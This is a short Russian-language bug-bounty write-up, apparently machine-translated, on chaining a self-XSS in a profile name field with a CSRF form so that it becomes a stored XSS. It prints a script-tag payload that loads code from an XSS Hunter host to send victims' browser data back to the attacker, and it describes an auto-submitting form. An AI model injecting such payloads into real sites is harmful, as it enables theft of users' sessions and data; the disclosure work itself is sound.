Здравствуйте, это Ренва из Курдистана. Я рад написать свою первую статью об информационной безопасности и Bugbounties.

Итак, я копался на веб-сайте и, наконец, нашел xss, когда пользователь хочет изменить свое имя, добавил простую полезную нагрузку и обновил страницу, бинго!

поэтому проблема в том, что профиль не является общедоступным, и единственный способ получить XSS - это сказать жертве изменить свое имя на вредоносный код javascript, и это будет называться Self-XSS, это не повлияет на него.

я начал burpsuite и изменил свое имя, запрос выглядит так:

хм, выглядит интересно, я создал poc CSRF burpsuite

воспроизведенный в браузере ответ был:

Потрясающие! Теперь у нас есть CSRF + Self-XSS, давайте объединим эту форму в цепочку:

как вы можете видеть в поле с фамилией, я добавил код javascript с сайта xsshunter.com, который генерирует XSS poc, вы должны попробовать.

› ‹Скрипт src =« https: //***.xss.ht › ‹/script›

и в последнем я добавил форму отправки javascript при загрузке файла, чтобы сделать его более эффективным.

теперь имя пользователя изменено на код javascript после того, как он перейдет на домашнюю страницу, код будет в его браузере и отправит обратно всю необходимую нам информацию, поскольку не было никакой защиты CSP.

и возвращаясь к XSSHunter, мы можем подтвердить, что он стал хранимым XSS, когда любой пользователь открывает нашу HTML-форму.

В конце концов, спасибо за чтение, если я помогал хлопать в ладоши для большего количества рецензий об информационной безопасности, помните, где есть self-XSS, всегда ищите CSRF, чтобы связать его вместе и сделать его сохраненным, с помощью self-XSS я не имею в виду, что пользователь ввел коды в консоль браузера или собственный XSS.

// Renwa